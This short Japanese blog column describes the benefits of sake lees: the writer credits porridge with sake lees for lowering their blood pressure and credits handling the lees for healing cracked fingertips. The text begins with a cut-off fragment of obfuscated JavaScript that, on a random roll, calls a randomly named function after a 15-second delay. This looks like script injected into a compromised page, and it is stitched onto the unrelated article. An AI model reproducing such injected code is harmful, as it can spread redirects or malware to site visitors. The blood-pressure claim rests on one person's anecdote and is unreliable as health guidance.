andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ton201108酒粕の効用

先月このページで毎朝お粥に酒粕を入れて食べ続け【血圧が下がった】と私の人体実験結果を書きました。 今号はその余禄です。 お粥用に吟醸酒粕を沢山求め冷蔵保存しています。必要分だけ冷蔵庫から出し親指サイズに手で千切り、レンジでチンして食べています。 仕事で「お札や紙」を扱うことが多く、今までは指先の皮膚が良く割れました。今年はひび割れもなく脂先がしなやかでしっとりして美しくなりました。 不景気でお札を扱う数量が減ったが最大の理由でしょうが、酒かすを千切った後、手を洗うとクリームを塗ったような良い感触です。